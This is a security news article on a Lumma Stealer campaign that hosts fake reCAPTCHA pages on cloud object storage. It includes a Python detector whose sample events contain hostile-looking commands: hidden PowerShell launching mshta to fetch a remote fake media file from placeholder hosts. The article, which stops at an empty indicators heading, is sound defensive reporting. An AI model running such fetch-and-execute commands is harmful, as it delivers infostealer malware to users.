A recent wave of sophisticated cyberattacks has leveraged major cloud infrastructure platforms including Oracle Cloud Infrastructure (OCI) and Scaleway Object Storage to deliver the Lumma Stealer (LummaC2 Stealer) malware to enterprise targets.
Security researchers have linked these campaigns to Russian-speaking threat actors, highlighting a new trend in abusing trusted, mainstream cloud services to facilitate malware distribution while evading traditional defense mechanisms.
Technical Overview
The attacks, first observed in early 2025, mark a significant escalation in adversary tactics, techniques, and procedures (TTPs).
Instead of relying on conventional phishing or compromised websites, threat actors are now exploiting developer-friendly and widely trusted platforms, initially Tigris Object Storage and later OCI and Scaleway, to host fake reCAPTCHA verification pages.
These pages, designed to mimic legitimate human-verification processes, instruct targeted users to execute clipboard-injected PowerShell commands via the Windows “Run” dialog.
This approach specifically targets high-privilege enterprise users, increasing the risk of lateral movement and deeper organizational compromise.
Once tricked, the victim executes a seemingly innocuous PowerShell script. This script, using “Living Off the Land” binaries (LOLBins) such as mshta.exe, fetches a remote payload disguised as a media file (commonly with .mp4 or .ogg extensions) from attacker-controlled domains.

The actual payload is Lumma Stealer: a malware-as-a-service (MaaS) infostealer that exfiltrates credentials, system details, and cryptocurrency wallets, with advanced modularity for further attacks.
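The delivery chain above (clipboard-supplied PowerShell launched from the Run dialog, then mshta.exe fetching a fake media file) leaves a recognisable process-creation footprint, which is the kind of behavioral detection the recommendations later in this piece call for. The following is an added example, not code from the Cato Networks report: a small scoring function run over constructed Sysmon/4688-style events, with hostnames under the reserved .invalid domain used as placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (Sysmon Event ID 1 / Windows 4688
# style fields). They are illustrative, not telemetry from the campaign, and
# the hosts are reserved .invalid placeholders.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell -w hidden -c "mshta https://cdn.example.invalid/sports.mp4"'},
    {"parent": "powershell.exe", "image": "mshta.exe",
     "cmd": "mshta.exe https://cdn.example.invalid/deflowev1.mp4"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": r"powershell -File C:\scripts\backup.ps1"},
    {"parent": "svchost.exe", "image": "mshta.exe",
     "cmd": r"mshta.exe C:\Windows\Temp\installer.hta"},
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
MEDIA_EXT = (".mp4", ".ogg", ".mp3", ".png", ".jpg")
INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe")

def score_event(ev):
    """Return the reasons an event matches the fake-CAPTCHA delivery chain
    (clipboard -> Run dialog -> PowerShell -> mshta -> remote 'media' file).
    An empty list means the event is not flagged."""
    reasons = []
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmd"]
    lc = cmd.lower()
    urls = URL_RE.findall(cmd)
    # mshta handed a remote URL instead of a local .hta: the LOLBin fetch step.
    if "mshta" in lc and urls:
        reasons.append("mshta_remote_url")
    # The remote resource is named like a media file but given to a script host.
    if any(urlparse(u).path.lower().endswith(MEDIA_EXT) for u in urls):
        reasons.append("script_host_fetches_media_ext")
    # Run-dialog launch (explorer.exe parent) of an interpreter with a hidden window.
    if parent == "explorer.exe" and image in INTERPRETERS and \
            ("-w hidden" in lc or "windowstyle hidden" in lc):
        reasons.append("hidden_interpreter_from_explorer")
    return reasons

def flagged_events(events):
    """Keep only events with at least one detection reason, paired with the reasons."""
    out = []
    for ev in events:
        why = score_event(ev)
        if why:
            out.append((ev, why))
    return out

if __name__ == "__main__":
    for ev, why in flagged_events(SAMPLE_EVENTS):
        print(f"{ev['parent']} -> {ev['image']}: {', '.join(why)}")
```

Weighting the individual reasons, rather than alerting on any single one, keeps legitimate explorer.exe-launched PowerShell and local .hta usage out of the alert queue.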
Russian-Language Attribution
According to the report, Cato Networks' analysis of compromised infrastructure and script DOM samples reveals consistent use of Russian-language comments embedded in the attack code.
These annotations, such as “Main container” and “Obfuscated code with garbage decoy functions,” appear intended to distract security analysts and obfuscate key logic, while also hinting at Russian-speaking developers and coordination.
Although not definitive evidence of direct state sponsorship, the sophistication and language use support theories of organized cybercriminal operations based in Russia.
The use of trusted cloud services like OCI and Scaleway, known for their developer flexibility and relatively low security visibility, serves two purposes: first, to bypass blacklists and automated security filters; and second, to exploit the trust that organizations place in such widely-used platforms.
By requiring manual user interaction (copying and executing commands), attackers also sidestep common automated detection systems.
Following public disclosure of these campaigns, Scaleway and Tigris quickly responded by removing malicious content and issuing statements on their anti-abuse efforts.
Oracle has not officially commented on the incidents as of this publication. Security vendors leveraging managed detection and response (MDR) platforms, such as the Cato MDR service, have proactively blocked redirection attempts to fake reCAPTCHA pages, employing high-confidence intrusion prevention signatures tailored to these unique TTPs.

These developments underscore an ongoing evolution in threat actor delivery tactics, especially the pivot to leveraging highly trusted cloud infrastructure and targeting technically proficient, privileged enterprise users.
Security teams are urged to reinforce behavioral detection and contextual analysis capabilities, educate users about the dangers of executing clipboard-supplied code, and closely monitor for abuse of object storage platforms.
As cybercriminals continue to innovate, collaborating with cloud service providers and sharing intelligence remains vital for shrinking the attack surface and limiting the effectiveness of these covert, cloud-based malware campaigns.
Indicators of Compromise (IoCs)